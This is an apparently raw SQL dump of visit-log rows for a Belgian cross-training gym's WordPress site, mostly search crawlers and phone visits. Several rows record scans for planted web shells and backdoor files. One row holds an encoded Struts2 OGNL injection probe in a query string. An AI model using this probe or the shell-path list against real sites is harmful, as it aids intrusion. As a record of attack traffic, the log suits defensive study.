(76142, 1498391804.346816, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/404.php.suspected', 'http://crosstrainingcenter.be/wp-content/themes/sketch/404.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76143, 1498391989.834812, 1592224796, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/evolution/content-wrapper.php', 'http://crosstrainingcenter.be/wp-content/themes/evolution/content-wrapper.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76144, 1498395419.230521, 2745986199, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(76145, 1498399397.867793, 1538629115, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0; T08 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36 OPR/42.7.2246.114996'),
(76146, 1498400398.184685, 3475901792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76147, 1498403085.423449, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76148, 1498404723.997266, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76149, 1498404724.560002, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76150, 1498404725.031313, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76151, 1498404725.514502, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76152, 1498404725.971401, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76153, 1498404726.444336, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76154, 1498404727.031413, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76155, 1498404727.479595, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76156, 1498404727.960919, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76157, 1498404728.420443, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76158, 1498404729.023856, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76159, 1498405486.150051, 3104599145, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/twentyeleven/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/themes/twentyeleven/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76160, 1498406082.972157, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76161, 1498406758.784728, 2999997207, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/framework.php', 'http://crosstrainingcenter.be/framework.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76162, 1498408136.634087, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76163, 1498410577.305750, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76164, 1498414810.129528, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76165, 1498416876.580437, 1998329138, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/?redirect:$%7B%23matt%3d%20%23context.get(\\\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\\\'),%23matt.setContentType(\\\'text/plain\\\'),%23matt.getWriter().println%20(\\\'successsuccess\\\'),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0'),
(76166, 1498416876.634802, 1998329197, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(76167, 1498417857.053691, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76168, 1498425466.468269, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76169, 1498425466.492584, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76170, 1498425466.747191, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76171, 1498425467.255742, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76172, 1498426617.042443, 3475901792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76173, 1498426617.600994, 3475901792, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76174, 1498428229.443868, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76175, 1498433187.619801, 3475901837, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76176, 1498437274.413043, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76177, 1498440352.292233, 2366148130, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76178, 1498440360.924068, 100662534, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76179, 1498443936.127422, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76180, 1498445498.697597, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/sidebar-widescreen.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76181, 1498446779.154165, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76182, 1498446779.781053, 2760155469, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76183, 1498451728.253351, 90545227, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/text/diff/engine/engine.php', 'http://crosstrainingcenter.be/wp-includes/text/diff/engine/engine.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(76184, 1498452161.354838, 1789313226, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/class.wp-tmps.php', 'http://crosstrainingcenter.be/wp-includes/class.wp-tmps.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76185, 1498453658.481407, 621375768, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76186, 1498453662.339078, 1600967971, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76187, 1498456724.777616, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76188, 1498459957.182627, 3166540021, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(76189, 1498460302.531483, 921308649, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Java/1.8.0_121'),
(76190, 1498461435.733940, 919627301, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76191, 1498461436.458439, 919627301, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(76192, 1498463438.638668, 3024883608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76193, 1498466506.438942, 2989642493, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J320F Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.5 Chrome/38.0.2125.102 Mobile Safari/537.36'),
(76194, 1498466508.506275, 2989642493, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J320F Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.5 Chrome/38.0.2125.102 Mobile Safari/537.36'),
(76195, 1498466598.243487, 2989642493, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J320F Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.5 Chrome/38.0.2125.102 Mobile Safari/537.36'),
(76196, 1498466631.210701, 2989642493, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J320F Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.5 Chrome/38.0.2125.102 Mobile Safari/537.36'),
(76197, 1498473519.403347, 632900847, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'android-app://com.google.android.googlequicksearchbox/https/www.google.com', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76198, 1498473521.242115, 632900847, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G928F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(76199, 1498473900.763444, 621375751, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76200, 1498474137.536928, 1463834777, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(76201, 1498474138.919220, 1463834777, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(76202, 1498484525.158150, 3024883469, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76203, 1498486330.820938, 2637637409, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76204, 1498487265.888927, 3472744982, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(76205, 1498487266.643740, 3472744982, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(76206, 1498487270.451047, 3472744982, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(76207, 1498487270.842644, 3472744982, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)'),
(76208, 1498492033.524536, 2637637433, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76209, 1498492034.025261, 2637637433, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76210, 1498492947.202322, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(76211, 1498499781.997434, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76212, 1498499782.511149, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76213, 1498499782.968036, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76214, 1498499783.490102, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76215, 1498499783.941623, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76216, 1498499784.413080, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76217, 1498499784.991312, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76218, 1498499785.444272, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76219, 1498499785.852841, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76220, 1498499786.552342, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76221, 1498499787.043300, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76222, 1498506689.355544, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76223, 1498509317.309796, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76224, 1498509319.819069, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76225, 1498509320.319303, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76226, 1498509320.873499, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76227, 1498509321.296462, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76228, 1498509321.745746, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76229, 1498509322.287129, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76230, 1498509322.793504, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76231, 1498509323.229379, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76232, 1498509324.717669, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76233, 1498509326.069900, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76234, 1498509502.805715, 3512960595, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(76235, 1498522255.967371, 3024883487, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76236, 1498529676.001075, 3475901898, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76237, 1498543378.210025, 3652617392, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76238, 1498545666.323622, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76239, 1498545666.840918, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76240, 1498549805.804355, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76241, 1498549808.110504, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76242, 1498550529.992286, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(76243, 1498550533.274746, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(76244, 1498552302.067176, 3475901792, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76245, 1498553019.065665, 1834514215, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(76246, 1498553021.173508, 1834514215, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7'),
(76247, 1498554529.752189, 3472376328, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 736)'),
(76248, 1498558485.254256, 1123635081, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76249, 1498558610.319026, 3475901792, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76250, 1498559368.652367, 3657083499, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76251, 1498560188.382695, 1512198042, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.fr/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-J710F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(76252, 1498560190.758641, 1512198042, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-J710F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(76253, 1498566433.582969, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(76254, 1498566434.116709, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76255, 1498566434.632645, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(76256, 1498566435.157261, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
